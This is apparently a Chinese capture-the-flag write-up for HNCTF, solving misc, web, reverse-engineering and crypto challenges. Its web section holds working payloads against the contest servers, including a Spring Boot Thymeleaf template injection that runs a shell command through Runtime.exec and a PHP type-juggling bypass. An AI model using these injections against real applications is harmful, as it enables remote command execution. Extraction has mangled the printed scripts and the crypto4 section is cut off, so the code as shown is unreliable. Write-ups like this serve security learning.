MISC

misc1

清除所有⽂本的格式，得到flag

FLAG: flag{HNCTF9090AS9nbg87600hn77hn88}

misc2

逐个解码

flag{ab71cda1

b495e13b3f21

f6fd50221978}

FLAG: flag{ab71cda1b495e13b3f21f6fd50221978}

misc3

⾸先提取蓝⽛的数据包然后转乘⼗六进制得到

50	4B	03	04	14	00	00	00	00	00	05	BF	FD	54	00	00
00	00	00	00	00	00	00	00	00	00	05	00	00	00	66	6C
61	67	2F	50	4B	03	04	14	00	00	00	08	00	05	BF	FD
54	09	D7	88	ED	3B	00	00	00	5C	00	00	00	0D	00	00
00	66	6C	61	67	2F	66	6C	61	67	2E	74	78	74	15	8A
8B	09	00	51	08	C3	56	EA	47	5F	75	FF	C5	CE	A3	10
12	28	01	54	8F	95	5E	3D	E4	AA	7C	32	5E	42	CD	60

64	5B	C8	26	59	77	1F	85	09	8C	CD	F0	19	CD	19	16
B8	B7	A2	A5	B7	D5	FF	FF	03	50	4B	03	04	14	00	00
00	08	00	05	BF	FD	54	CD	33	33	9E	3B	00	00	00	5B
00	00	00	08	00	00	00	66	6C	61	67	2F	6B	65	79	15
CA	C1	11	00	41	08	02	C1	94	04	11	34	FF	C4	6E	EF
33	D5	8F	19	C2	3C	F9	86	C0	B2	78	BD	65	2A	4F	BB
AF	C6	28	B7	BC	30	E5	8E	63	B9	3B	DA	82	23	FE	1B
1A	32	AB	55	AA	8C	AF	31	18	7E	50	4B	01	02	14	00
14	00	00	00	08	00	7D	BF	FD	54	41	E0	3A	B4	D1	B8
5F	00	C2	DC	61	00	0A	00	24	00	00	00	00	00	00	00
20	00	00	00	00	00	00	00	65	6E	63	6F	64	65	2E	65
78	65	0A	00	20	00	00	00	00	00	01	00	18	00	2B	45
02	40	64	A3	D8	01	1D	8A	A1	A0	68	A3	D8	01	D1	2E
64	9D	68	A3	D8	01	50	4B	01	02	14	00	14	00	00	00
00	00	05	BF	FD	54	00	00	00	00	00	00	00	00	00	00
00	00	05	00	24	00	00	00	00	00	00	00	10	00	00	00
F9	B8	5F	00	66	6C	61	67	2F	0A	00	20	00	00	00	00
00	01	00	18	00	17	2C	C8	B7	63	A3	D8	01	87	A3	42
A4	68	A3	D8	01	DF	2C	5B	9D	68	A3	D8	01	50	4B	01
02	14	00	14	00	00	00	08	00	05	BF	FD	54	09	D7	88
ED	3B	00	00	00	5C	00	00	00	0D	00	24	00	00	00	00
00	00	00	20	00	00	00	1C	B9	5F	00	66	6C	61	67	2F
66	6C	61	67	2E	74	78	74	0A	00	20	00	00	00	00	00

01	00	18	00	1D	53	C8	B7	63	A3	D8	01	D2	49	A4	9D
68	A3	D8	01	D6	53	5B	9D	68	A3	D8	01	50	4B	01	02
14	00	14	00	00	00	08	00	05	BF	FD	54	CD	33	33	9E
3B	00	00	00	5B	00	00	00	08	00	24	00	00	00	00	00
00	00	20	00	00	00	82	B9	5F	00	66	6C	61	67	2F	6B
65	79	0A	00	20	00	00	00	00	00	01	00	18	00	1D	53
C8	B7	63	A3	D8	01	E5	A1	5B	9D	68	A3	D8	01	B8	7A
5B	9D	68	A3	D8	01	50	4B	05	06	00	00	00	00	04	00
04	00	6C	01	00	00	E3	B9	5F	00	00	00

然后写⼊到⽂件中可以得到⼀个压缩包，解压后得到

# FLAG 1000458327592607004432608391025170823332079777935577920870309781630518814019

1914132269450797

# KEY 5216294695211820293806247029887026154798297270637676463374801674229881314620

340407569315152

从⼗进制转化为⼗六进制，然后放到cyberchef⾥⾯异或后得到flag

FLAG: flag{66526827ff3ba85e1444a0df4acbba93}

misc4

⾸先密⽂⼀看就是html实体，那么就进⾏html实体编码转换，发现是反的，那接着在对密⽂进⾏反向，再解base64， 得到了如下的密⽂

接着在进⾏rot13解密，步进是24，得到flag

FLAG: flag{HNCTFbs345680967709b5}

WEB

web1

找到这个路径

FLAG: flag{a082bab3-d291-47a7-b636-f4e457d05428}

web2

fuzz后，发现/admin; 有回显，分析得到这是java框架的⼀个路由。然后打spring boot Thymeleaf 模板注⼊

http://101.200.58.4:3333//admin/?

path= $%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat

%20/flag%22).getInputStream()).next()%7d ::.x

web3

利⽤python的格式化字符串的特性构造如下的payload http://101.200.58.4:1111/?evalme=%22%c%c%c%c%c%22%(47,102,108,97,103)

%22%c%c%c%c%c%22%(47,102,108,97,103) == /flag

web4

在第⼀个界⾯有 we1cone tooooooo/F1aaj.php

进⼊ /F1aaj.php ，得到

看cookie中出现了flag字段，值是 %2FFLLL4g.php

?X[]=1&Y=0e215962017&Z=base_convert(1751504350,10,36)(base_convert(784,10,36))

最后得到 FFLLLLLLLLLLLaGGGGG.php

http://101.200.58.4:20005/FFLLLLLLLLLLLaGGGGG.php

RE

re1

安卓逆向，找到 strings.xml ⽂件

跑如下脚本

setImmediate(() => { Java.perform(() => {

Java.choose(“com.example.re2.MainActivity”, { onMatch: instance => {

const javaString = Java.use(‘java.lang.String’);

console.log(javaString.$new(instance.cipher.value).getBytes());

},

onComplete: () => console.log(“end”)

});

});

});

得到

102,97,116,100,123,115,109,95,99,103,114,109,118,99,95,121,108,118,104,111,107,1

04,117,107,95,103,120,115,103,102,102,99,95,119,116,101,99,125

再跑

public boolean checkcin(String str) {

byte[] keyBytes = getString(R.string.key).getBytes(); char[] inputChars = str.toCharArray();

char[] transformedChars = new char[inputChars.length];

for (int i = 0; i < inputChars.length; i++) { char ch = inputChars[i];

if (ch == ‘_’ || ch == ‘{‘ || ch == ‘}’) { transformedChars[i] = ch;

} else if (ch >= ‘a’ && ch <= ‘z’) {

byte keyByte = keyBytes[i % keyBytes.length]; transformedChars[i] = (char) (((keyByte – 97 + ch – 97) % 26) +

97);

} else {

break;

}

}

return this.cipher.equals(new String(transformedChars));

}

然后魔改凯撒算法，使其相减

def check_cin(input_str, key): bytes_key = key.encode() char_array = list(input_str) c_arr = [”] * len(char_array) key_len = len(bytes_key)

for i, ch in enumerate(char_array): if ch in [‘_’, ‘{‘, ‘}’]:

c_arr[i] = ch

elif ‘a’ <= ch <= ‘z’:

c_arr[i] = chr((((ord(ch) – 97) – (bytes_key[i % key_len] – 97))

% 26) + 97)

else:

break

else:

return ”.join(c_arr) return ”.join(c_arr[:i])

key = “aptxcony”

result = check_cin(“fatd{sm_cgrmvc_ylvhokhuk_gxsgffc_wtec}”, key) print(result)

最后的到flag

FLAG: flag{ez_crypto_algorithm_reverse_haha}

re2

python解包后得到⼀个py⽂件

import turtle

def flyTo(x, y): turtle.penup() turtle.goto(x, y) turtle.pendown()

def drawEye(): turtle.tracer(False) a = 2.5

for i in range(120):

if not 0 <= i < 30: if 60 <= i < 90:

a -= 0.05

else:

a += 0.05

turtle.left(3) turtle.fd(a)

else:

turtle.tracer(True)

def beard():

flyTo(-37, 135)

turtle.seth(165) turtle.fd(60) flyTo(-37, 125)

turtle.seth(180) turtle.fd(60) flyTo(-37, 115)

turtle.seth(193) turtle.fd(60) flyTo(37, 135) turtle.seth(15) turtle.fd(60) flyTo(37, 125)

turtle.seth(0) turtle.fd(60) flyTo(37, 115) turtle.seth(-13) turtle.fd(60)

def drawRedScarf(): turtle.fillcolor(“red”) turtle.begin_fill() turtle.seth(0) turtle.fd(200) turtle.circle(-5, 90) turtle.fd(10) turtle.circle(-5, 90) turtle.fd(207) turtle.circle(-5, 90) turtle.fd(10) turtle.circle(-5, 90) turtle.end_fill()

def drawMouse(): flyTo(5, 148) turtle.seth(270) turtle.fd(100) turtle.seth(0)

turtle.circle(120, 50) turtle.seth(230) turtle.circle(-120, 100)

def drawRedNose(): flyTo(-10, 158)

turtle.fillcolor(“red”) turtle.begin_fill() turtle.circle(20) turtle.end_fill()

def drawBlackdrawEye(): turtle.seth(0) flyTo(-20, 195)

turtle.fillcolor(“#000000”) turtle.begin_fill() turtle.circle(13)

turtle.end_fill() turtle.pensize(6) flyTo(20, 205) turtle.seth(75) turtle.circle(-10, 150) turtle.pensize(3) flyTo(-17, 200)

turtle.seth(0) turtle.fillcolor(“#ffffff”) turtle.begin_fill() turtle.circle(5) turtle.end_fill()

flyTo(0, 0)

def drawFace(): turtle.forward(183) turtle.fillcolor(“white”) turtle.begin_fill() turtle.left(45) turtle.circle(120, 100) turtle.seth(90) drawEye() turtle.seth(180) turtle.penup() turtle.fd(60) turtle.pendown() turtle.seth(90) drawEye()

turtle.penup() turtle.seth(180) turtle.fd(64) turtle.pendown() turtle.seth(215) turtle.circle(120, 100) turtle.end_fill()

def drawHead(): turtle.penup() turtle.circle(150, 40) turtle.pendown()

turtle.fillcolor(“#00a0de”) turtle.begin_fill() turtle.circle(150, 280) turtle.end_fill()

def drawAll(): drawHead() drawRedScarf() drawFace() drawRedNose() drawMouse() beard() flyTo(0, 0) turtle.seth(0) turtle.penup()

turtle.circle(150, 50) turtle.pendown() turtle.seth(30) turtle.fd(40) turtle.seth(70) turtle.circle(-30, 270) turtle.fillcolor(“#00a0de”) turtle.begin_fill() turtle.seth(230) turtle.fd(80) turtle.seth(90) turtle.circle(1000, 1) turtle.seth(-89) turtle.circle(-1000, 10) turtle.seth(180) turtle.fd(70) turtle.seth(90) turtle.circle(30, 180) turtle.seth(180) turtle.fd(70) turtle.seth(100) turtle.circle(-1000, 9) turtle.seth(-86) turtle.circle(1000, 2) turtle.seth(230) turtle.fd(40) turtle.circle(-30, 230) turtle.seth(45) turtle.fd(81) turtle.seth(0) turtle.fd(203) turtle.circle(5, 90) turtle.fd(10) turtle.circle(5, 90)

turtle.fd(7) turtle.seth(40) turtle.circle(150, 10) turtle.seth(30) turtle.fd(40) turtle.end_fill() turtle.seth(70) turtle.fillcolor(“#FFFFFF”) turtle.begin_fill() turtle.circle(-30) turtle.end_fill() flyTo(103.74, -182.59)

turtle.seth(0) turtle.fillcolor(“#FFFFFF”) turtle.begin_fill() turtle.fd(15) turtle.circle(-15, 180) turtle.fd(90) turtle.circle(-15, 180) turtle.fd(10) turtle.end_fill()

flyTo(-96.26, -182.59)

turtle.seth(180) turtle.fillcolor(“#FFFFFF”) turtle.begin_fill() turtle.fd(15) turtle.circle(15, 180) turtle.fd(90) turtle.circle(15, 180) turtle.fd(10) turtle.end_fill()

flyTo(-133.97, -91.81)

turtle.seth(50) turtle.fillcolor(“#FFFFFF”) turtle.begin_fill() turtle.circle(30) turtle.end_fill()

flyTo(-103.42, 15.09)

turtle.seth(0) turtle.fd(38) turtle.seth(230) turtle.begin_fill() turtle.circle(90, 260) turtle.end_fill() flyTo(5, -40) turtle.seth(0)

turtle.fd(70) turtle.seth(-90) turtle.circle(-70, 180) turtle.seth(0) turtle.fd(70)

flyTo(-103.42, 15.09)

turtle.fd(90) turtle.seth(70) turtle.fillcolor(“#ffd200”) turtle.begin_fill() turtle.circle(-20) turtle.end_fill() turtle.seth(170) turtle.fillcolor(“#ffd200”) turtle.begin_fill() turtle.circle(-2, 180) turtle.seth(10) turtle.circle(-100, 22)

turtle.circle(-2, 180) turtle.seth(170) turtle.circle(100, 22) turtle.end_fill() flyTo(-13.42, 15.09)

turtle.seth(250) turtle.circle(20, 110) turtle.seth(90) turtle.fd(15) turtle.dot(10) flyTo(0, -150) drawBlackdrawEye()

def main():

turtle.screensize(800, 6000, “#F0F0F0”) turtle.pensize(3)

turtle.speed(9) drawAll() turtle.penup() turtle.goto(100, -300)

turtle.write(“by peak”, font=(‘Bradley Hand ITC’, 30, ‘bold’))

if name == ” main “: main()

turtle.mainloop() print(“fVJXNjE0ODBpM2RrZmNSVzYxNDgwaTNka01BSlVPe25oc20=”)

# okay decompiling 2.pyc

得到 fVJXNjE0ODBpM2RrZmNSVzYxNDgwaTNka01BSlVPe25oc20=

放到cyber⾥⾯解密

得到flag

FLAG: flag{HNCTFdw3b08416PKvydw3b08416PK}

re3

解压后得到⼀个源码和⼀个头⽂件

打印出⽂件⾥⾯的所有⽅程式然后进⾏z3求解

flag = ”

# 0-2

for i in range(0x20, 0x7f):

for j in range(0x20, 0x7f):

for k in range(0x20, 0x7f):

if i + j == 101 and j + k == 143 and i * k == 5035: flag += chr(i) + chr(j) + chr(k) print(f'[{chr(i)}{chr(j)}{chr(k)}]’)

# 3-5

for i in range(0x20, 0x7f):

for j in range(0x20, 0x7f):

for k in range(0x20, 0x7f):

if i + j == 226 and i + k == 163 and j * k == 5814: flag += chr(i) + chr(j) + chr(k) print(f'[{chr(i)}{chr(j)}{chr(k)}]’)

# 6-8

for i in range(0x20, 0x7f):

for j in range(0x20, 0x7f):

for k in range(0x20, 0x7f):

if j + k == 205 and i + k == 173 and i * j == 9744: flag += chr(i) + chr(j) + chr(k) print(f'[{chr(i)}{chr(j)}{chr(k)}]’)

# 9-11

for i in range(0x20, 0x7f):

for j in range(0x20, 0x7f):

for k in range(0x20, 0x7f):

if i + j * k == 5375 and j + i * k == 4670 and i + j == 205: flag += chr(i) + chr(j) + chr(k) print(f'[{chr(i)}{chr(j)}{chr(k)}]’)

# 添加最后⼀个字符

flag += ‘w’

# 打印最终的 flag print(flag)

然后得到flag

FLAG: flag{50_pr3TtYn_0}

re4

.net framework 程序

然后⽤dnspy打开找到maze地图，

发现maze地图是rc4加密的通过动调后得到解密出地图

00******0000

*000000*0**0

******0*0**0

**100*000**0

****0******0

****00000000

然后按照地图控制udif进⾏移动，u-上，d-下，i-做，r-右

rdrrrrrddrruuurrrdddddllllllluull

点击按钮后发现不会输出flag，疯狂点了⼏次后意外得到了flag

FLAG: flag{4DC8EF9E2B5CABD955DC18BBC6A35B16}

CRYPTO

crypto1

变表base64编写如下脚本

from base64 import b64decode import string

ss = b’0123456789abcdef-_{}’

def decode(idx, mm): if idx >= 4:

try:

t = b64decode(mm) except:

return

if all(v in ss for v in t): if t is not None:

print(str(t, encoding=”utf-8″), end=”)

return

if mm[idx] == ‘Q’: for v in “QRSTU”:

new_mm = mm[:idx] + v + mm[idx + 1:] decode(idx + 1, new_mm)

else:

decode(idx + 1, mm)

m = ‘QEFQQ1QGezc4YWQhMQEzZQcwOWZkZjEyYQVhYQQhYQVkZDYyZQMzfQ==’ m = m[8:] # GASCTF

print(“flag”, end=”)

for v in range(0, len(m), 4): segment = m[v: v + 4] decode(0, segment)

得到flag

FLAG: flag{78ada113e709fdf12a5aa4aa5dd62e33}

crypto2

RSA解密，c，n同⻓度，跑如下脚本

from Crypto.Util.number import long_to_bytes import gmpy2

c = 1924635889210773924711378522965854207843051472146513194916783167061162458090

6373552504812725817038734784405792985200364740451710657921959959746582283869

6978021057943087815129261170288718804166906926446015626817088535417846938913

2838450834398493018168203742426193822379309445968101310981520048027589913953

4149459627433347692521885734369708394139148153730959741849311837888996907794

7858566685542982159122155387393783109572071514852579425257697689148949947949

7861512

n = 2260375559104345425590426977960386256287009777233277062625487017885931446911

9429212014928501671154550719358312832699485692203567639887628252303155206337

0244386669023994524294837078197571432530830654333760078334079245899150668584

3729962897796956171467876531084194426101796617903015810156717396227079274786

2692173706184772668673891555513787987132598437502897658587176279256890215613

5243808003980495714551347876764167464434660922403427490622878459343546241327

8410143

for k in range(2**21): tmp = c + k * n

t, is_exact = gmpy2.iroot(tmp, 3) if is_exact:

print(str(long_to_bytes(t)).split(“/”)[0])

FLAG: flag{0f5a1806d07f030767e113352727ea2d}

crypto3

👄 👋 🐹 🐸 👂 👱 🐯 🐢 👚 👊 🐬 👨 👌 👢 👅 🐿 👊 🐩 👅 👆 👈 🐧 🐢 👁 👡 🐯 👰 👂 🐩 👛 👂 👂 👋 👯

🐺 👋 🐩 👄 👤 👉 🐾 👄 👭 👃 👋 👀 🐢 👁 👠 👯 🐻 👀 👌 🐽 👩 👍 👫 🐾 👇 👥 🐼 👭 👌 👌 👣 🐺 👊 🐾

🐬 👘 👌 👢 👁 👄 👌 👍 👉 👅 👄 👠 👫 👦 👊 👌 👅 🐺 👅 👍 🐬 👘 🐧 👍 👞 👂 🐪 👍 🐼 👉 👰 👐 🐭 👏

👊 👚 🐧 👏 🐨 👦 🐯 👆 👋 🐰 👬 👂 🐪 👍 👈 👈 👢 👟 👭 👃 🐩 👀 👁 🐼 👑 👙 👋 👋 👉 🐺 👅 👋 🐯 🐨

👇 🐼 👁 👈 👁 👠 🐬 🐼 👐 👱 🐽 👁 👃 👱 🐫 👤 👃 👎 👅 👂 👆 🐸 👧 👋 🐨 👀 🐦 👅 🐧 👪 👤 👍 👡 👄

👢 👉 🐺 🐬 🐾 👈 👢 👯 👉 👍 🐼 🐧 🐪 👙 👣 🐸 👟 👑 🐧 👞 👡 👌 👀 👣 👉 👎 🐸 👪 👃 🐼 👟 🐿 👁 👡

👦 👧 👍 👡 🐼 👮 👈 🐺 👪 🐦 👇 👱 👛 👃 👁 👣 👑 🐺 👊 🐾 🐯 👑 👌 👁 👫 👇 👠 👄 🐢 👄 👠 👫 👦 👎

🐼 👢 🐯 👈 👢 🐯 👮 👁 👢 👍 👞 👃 👎 👈 👰 👈 👎 🐯 👭 👑 👠 🐯 👁 👤 👄 👮 👚 👋 🐰 👊 👑 👣 👣 👣

👄 👰 👉 🐽 👃 🐨 🐰 🐺 👋 🐽 👀 🐮 👏 👱 👅 🐼 👂 🐼 🐨 👑 👇 👁 👅 👉 👠 🐨 🐾 👀 👋 👍 👢 👌 👌 👚

👤 👆 👣 🐧 👥 👈 👎 👫 👡 👇 👱 🐧 👭 👄 👌 🐬 👘 👀 👋 👛 👨 🐩 🐹 🐽 👄 🐺 🐰 🐨 👅 🐻 👀 🐧 👈 👡

👌 🐦 👅 👌 👅 👠 👊 🐿 👀 🐪 👉 👠 👑 🐾 👌 👋 👐 🐢 👁 👠 🐨 👊 👡 🐼 👮 👇 👥 🐽 👰 👇 🐨 👁 👣 👍

🐼 👛 🐺 👊 🐿 🐽 🐻 👇 🐼 👁 👄 👌 👍 👉 👅 👉 🐨 👢 👮 👄 👢 🐩 👚 🐼 👉 👦 👛 🐼 👍 👞 👂 🐪 👍 🐼

👈 👎 🐯 👯 👄 👍 👟 🐹 👘 🐩 👄 🐦 👇 👊 🐯 👯 👋 👣 👦 👟 👈 👟 👯 👈 👱 👯 🐺 👙 👋 🐨 🐨 👇 👋 👉

🐺 👅 👋 🐯 🐨 👈 🐩 👁 👀 👚 👡 👛 🐾 👁 👢 👚 👧 👉 👊 👯 🐹 👍 🐨 🐹 👈 👠 🐰 👅 👂 👊 🐯 🐦 👌 👤

👐 👭 👍 🐧 👁 👀 👚 🐺 👍 👱 👈 👤 🐧 🐢 👀 👱 🐫 👰 👂 🐩 👐 👍 👋 🐽 🐾 👘 👣 👮 👠 👉 👎 🐸 👩 👎

👡 👫 🐺 👄 🐩 🐯 👣 👏 👡 🐼 👮 👇 👥 🐽 👰 👇 🐩 🐫 👩 👄 🐽 👱 👁 🐼 👌 👭 👏 🐧 👁 👫 👇 👠 👄 🐢

👉 🐨 👢 👱 👆 👋 👛 🐻 👐 👢 👢 🐰 👘 🐼 👍 👞 👂 🐨 🐼 🐫 👆 👢 👭 👘 👢 👀 🐯 👁 👤 👄 👮 👚 👊 🐧

🐫 👁 👢 👈 👠 👈 👢 👟 👮 👃 👱 👅 🐺 👌 👠 👁 👭 👇 👊 👯 🐧 👌 👅 🐽 👅 🐽 🐫 👮 👃 👍 👯 🐽 👐 🐺

👮 👪 👊 🐼 👚 👤 👆 🐼 👮 🐦 👄 👋 🐹 🐸 👂 👱 🐯 🐢 👚 👊 🐬 👌 👡 👛 👨 👊 🐩 🐹 🐽 👃 🐩 👮 🐨 👐

👤 👈 👰 👂 🐩 👟 👐 👊 👋 🐼 👩 👌 👋 👛 🐿 👉 👎 🐸 👩 👌 👋 👪 👈 👎 👚 👦 👘 👡 👉 👝 👎 👡 👮 🐬

👇 🐨 👁 👤 👎 👎 👌 👱 👁 🐼 👁 👋 👅 👌 👀 👯 👅 👢 👫 👄 👅 🐬 👈 👀 👎 👚 👱 👂 👰 👅 👊 👃 🐼 👍

👞 👂 🐪 👍 🐼 👆 👰 🐨 👩 👋 👎 🐹 🐹 👘 🐩 👁 👧 👘 🐻 🐯 🐪 👍 👫 👃 👈 👢 👟 👮 👈 👠 👅 🐿 👎 🐽

👪 👟 👙 👰 🐰 👪 👐 👊 👯 👑 👄 👊 👫 👉 👋 🐧 🐯 🐪 👑 👞 🐴

先base100解，得到

MTBAKz8+cS5qUkNHS2NOQm0+Jj8yK2dKKTxCT2MmRGMvLTI+JixDIUFrYVtGPnEvUUlCSG5aUkJM UVRNMitoSUNCNV5ba0VgK3VERyY6XSc0X1o8OT9uK3VQQkhvL2VIJEZbTTRCNT81PEJQJi5EYzFJ

Lz4mLWNKOHApT1I/N0smVjMkRC5GQkxRVE03blAhZ0gjLUIlRWAsLEhHJjopVjEwQCs/PzdLJlZC SG8vZUJtPiM+MitoWEk8Qk8wJkVgLWQyQW8vZi88JmMwcT9SZlllMyRFL19CTFI7XzNEKE1ZPEJN

Ri1GITVkUUcmOl0nQWtjPz0vMU5aITdqS2BFMC91NDI0QjU/NUNiSHI3RiZGUTY+Ji1jSjEwPnFy P1JlVEdCSHFDPEJMUVRNR1kwMkM2cERodEVgK3VEQW8xMVhBa2M/PS8xTlohQkhxQzxCbT11PTRC NT81Q2JIcjdGJkcpRSxBZV1BQi9NKS8/UmYvV0JIcCVzQm0+Iz4yK2YpVTFGalwiRWArWjtCM28l XjEwPnFyP24rMFUzJEUvX0JtPiM+R1kzOTdDYkk9aEVgK1E4OmkvakI8JmMwcS04JkQiQkhwLzNC UiJvPSx0XUNFNF4wLVxFYCwsSEcmOEw/MTBAKz8+cS5qUjdqS2BFL2w1YmQyK2hYSTErUTdHRWAr UTgsQWcoajRfWjw5P1JmWWUzJEJTNUIxNktMN25QIWczKyNSLEVgK3VEOy1rTWBBa2JpaD83SVtL QkhwQiNHWFshby9sYSxZMStRT083Zg==

再base64解

10@+?>q.jRCGKcNBm>&?2+gJ)

<BOc&Dc/-2>&,C!Aka[F>q/QIBHnZRBLQTM2+hICB5^[kE`+uDG&:]’4_Z<9? n+uPBHo/eH$F[M4B5?5<BP&.Dc1I/>&-cJ8p)OR?7K&V3$D.FBLQTM7nP!gH#-

B%E`,,HG&:)V10@+??7K&VBHo/eBm>#>2+hXI<BO0&E`-d2Ao/f/<&c0q?

RfYe3$E/_BLR;_3D(MY<BMF-F!5dQG&:]’Akc?=/1NZ!7jK`E0/u424B5?5CbHr7F&FQ6>&- cJ10>qr?ReTGBHqC<BLQTMGY02C6pDhtE`+uDAo11XAkc?=/1NZ!BHqC<Bm=u=4B5?

5CbHr7F&G)E,Ae]AB/M)/?Rf/WBHp%sBm>#>2+f)U1Fj\”E`+Z;B3o%^10>qr? n+0U3$E/_Bm>#>GY397CbI=hE`+Q8:i/jB<&c0q-8&D”BHp/3BR”o=,t]CE4^0-\E`,,HG&8L? 10@+?>q.jR7jK`E/l5bd2+hXI1+Q7GE`+Q8,Ag(j4_Z<9?

RfYe3$BS5B16KL7nP!g3+#R,E`+uD;-kM`Akbih?7I[KBHpB#GX[!o/la,Y1+QOO7f

再base85（ascii）解

2XIJ]*9pk2n!ix}i5JJ>U<ceoR,xZk$kfM(I]*MSh#!/hEhk5Jf<goRvrR;xvmbj=i(I`*PTh#/4 yx{i<UT.U<keoRn3ZkKmJu(I^*XT8!QzhEhkGJ#<ylRvrR? xvmQU2XIJ^*XTh#/4ix|i5Jk=U<RvrRn3fm$kT8%I_*fT8!n!hE|i9J#

<U<!Ys!xxvmbjfMWf,*9pG$/4/8@i<UT.l/!YsR,xZkKm2X(I_*HTh#n!hEhkxJ#

<D?!YrR;xfmKmfMWf,*9ph#n!ix{i<UT.l/!YsR;x#m$kg5(I_*XTh#H)ix|i5J#

<3+#*rR2xg^bj2X(I`*9p8!n!ix|ixJz.l/,*rR/xPmKmT8%I&.XTh#K;hx|i%J#<=[#*rR? xvm$k2XIJ]*9pG$/4.P[i5Jk=2+RvrR/x#mKm=i(I_*fT8!%@gEhkGJ#

<8_RvrR;xQ^$kfMIJ^*1ph#QzxE|i.U#<2+ZvG

再base91解

chgdchg5clctclcxclc5cdc9chcdcdc9chctchglcdc9chclclcdclcpchchchgdchg5clg5chg9 clcpchclcdcdchg9chg5chctclc9chghclchchclclcpclchchghchg5clcpcdclchcpchclcdc9 clcdcdc9chglchg5chg5chctcdc9clchclcdchclchgdchcpcdclchclcdc9chghclcdchg5chct clcpchctclclchgpclclchgdclcBchgdchcpchgdclclcdc9chglchcdclg5chglchg5clctchct clctclchchgdchglchg9clcpcdchchcpclclclcpcdc9chg9chcxchclcdghcdghcdghcdghcdgh cdgh

再base62解（https://www.a.tools/Tool.php?Id=120）

4C4A575851324332474E32455356444C4A5A4B5645334B4A47524D544556544D4A5635464532

53324E4A4A47325453454C463545324D534A475647554F554C594C464C55324E435A4E4A5747

57544C4E4B5634465556324B48453D3D3D3D3D3D

再转字符串，bae32解，在base64解，得到flag

FLAG: flag{HNCTFb8cee34cf4f4633b90d1ac8b9d2e1eb}

crypto4

这题分三步求解，解出每个值之后再求的flag写出如下的脚本

import gmpy2

from Crypto.Util.number import getPrime, isPrime, bytes_to_long from secret import FLAG, E1, E2, P, Q1, Q2

def next_prime(num: int) -> int:

num = num + 2 if num % 2 else num + 1 while not isPrime(num):

num += 2 return num

p = getPrime(1024)

q = next_prime(getPrime(16) * p + 38219) n = p * q

c = pow(E1, 65537, n)

print(f’n = {n}’)

print(f’c = {c}’) #

n=16052476007247525987982546392242157061715063596549613573244280279857879420 0810376656274546483896156908144691611376951771334442011358425425900017257281

1154232107339480903672251992191997458469905064423618888336088652352540882576

8269883557831592379710437701326283447989373531509300713093479728041189528144

4757620706614703123874909884266204682574398820881390313879678994091151582551

7078554074496474819128789835309636804325132602557092847746454786387067599510

7693820785216916099703205285312704740917134770403438972699034894414100625927

3230240285403541543807865668880690535049582533458453334544809133556579209189

0185673190424063 #

c=75163905761067701326406143143418908301758990811830724721700753393843522943 1015858783222167911772848893015518607229280589985711010766459396989232072512

3145949170293752213353612090361127423888668738241633508866105149730383165120

3245935205315841770540603146633244037887192717473197579457989491299993664116

3063898365134788537389162378185448090279397717831977803284480743612393591614

2849729814357493622556545611217581634858840752601562883371767137564718794897

6741683686866115369315779273314276567188779230318137662086450638682082686634

0907593080654521498766421056474652652337037121881207188033108746890998208582

406826010121861

assert E2.bit_length() == 69

ns = [getPrime(1024) * getPrime(1024) for _ in range(3)] cs = [pow(E2, 89, n) for n in ns]

print(f’ns = {ns}’)

print(f’cs = {cs}’) # ns=

[158632305865006849113563847421234041202136990520180485886503920099275653696

8549725634468215018992313100958632364050777370699770486089868294630803102036

1302334248895233255911348365179153799197341744863134926804603973507415697810

4409163050923951803822397295508336078475240053911374744978490770975744521153

7936846354008717280090221082214368701481363136636065258321626913811678548948

5772437870528892032119729929607857459621078790511144060710035933887337208301

0788921638372034120811145101434060138923936079325969213088890589095445846196

7638076648549311481475387827288186690721023568187768949367166853425177839765

8670518117,

1414409846943861935868265282850774438169729355667071768555358571966500244047

6256008471235313826051740009083510860714991201047915737216102220242621674841

6009871220059145420619636182722759868359286739203757682723909127787415026559

0928139094860646784711837764135754793147258883672633975857603827382047087963

7555458446243401248151675266602656677360819563744765522495640821496694918515

6692436141417047448489807461015697854397285851448416556659593894605126288007

8274276414777315043055285933126966762694299339210189766171987137572114324027

0211821269260950380944670195863016621594387236339317938305273510719419578308

449465183,

2756382287959350393837782196042721902256521563185633351078256849601654775794

5464794632272818101891677705256471714805217606503652132995136255720639088424

5760036506282112710256481836006351458955284661990686400944700785264133247080

2857828994924128882854214320376919939950066931187839125583797793263477277859

4526940501234736059441483897017015324765266787399950699732518347518591167932

0310313202651361583044601996540088950952747549181537735668249314403425256887

4128923515388269946154952342516984626659715677353516359964018945717127205831

1480951820887261040891344076039474315985825984444520336790670313179493074014

037981261]

# cs= [383309560783086294807909732325487278958657695331767109975208326194961660875

9231291050566542764984974722790226120399722937104503590740358249900089784508

4908303795316327521697779492007185670330185771846581770194049038179200244689

2371544135540467244300772352575076843089542537612467922571568738238011462810

3058312176343693900115638265002657622618744666247132114654135429040069316368

8399388817165549015930319012729929402004844604361936991755003763684567069985

6406469382000877890034435774569165287550081044714708871528958135150187601204

4611990972521570253106671158207677490849249612002954497927762168699886110455

354481924,

1502420121177211156091634258259634977709023894278792755694473756163084431123

7741015128663169899179220520231684011672122842199072725281170246704436989902

3824303022111700437245647552150235040413746908857017088540926556708437606925

6924135270283335242133163303599239181417949980292944203204296598188175632723

9687796729940907885853433024734423898654593981426341043317435173845892007893

3148939437560480195199483164733983911269839414132817896751663645259238524813

5340133712522135715943787590172334743893259621909532456281362868290556461907

9367742311669369156698165093784198921491645525481317769797063816414778789314

03040942,

8992204063713908492214256291861339175525948946919629972908439132005643626148

6783471983815316339071828771527280779583455190834066374469720793871617269672

9588644779161316657739123386658335479384212190223464483064005018113038199608

3089350911224037154798259291124104894554037604500881250119806371348673833105

1036007822868982763545738847882515422114341434767743914575878857723799901048

3518710461992244261386068279247038949080422805067112449592553602457110494411

2397143299499508504917890140939438891891453283594000764399193028606955089853

6540711989099735558440046851497137741675242241004879378991264805456815655816

73958854]

qq = getPrime(1024) nn = P * qq

qqq = qq >> 460 << 460 print(f’nn = {nn}’)

print(f’qqq = {qqq}’) #

nn=1685173579777119965962593679727915852637974129869233978604949432938561819 1510929735113284926125682522862667382938603116481087115598324232020838136618

5189643437526530001456110929806125569479547283395084166460352956518528400992

0512758760689823520311487594263790016764430065759996642045918713102711726800

4042708998239798434578246497419547543598779697909298102358128788120332794123

6907146474990913262450229779705104689258373633005459006574201348948152461890

4337561987991552361189053814225704275386866584469202912422902805654709676432

0547579965641276151760507921199827910445919017775913411823263307923216323527

883262438117 #

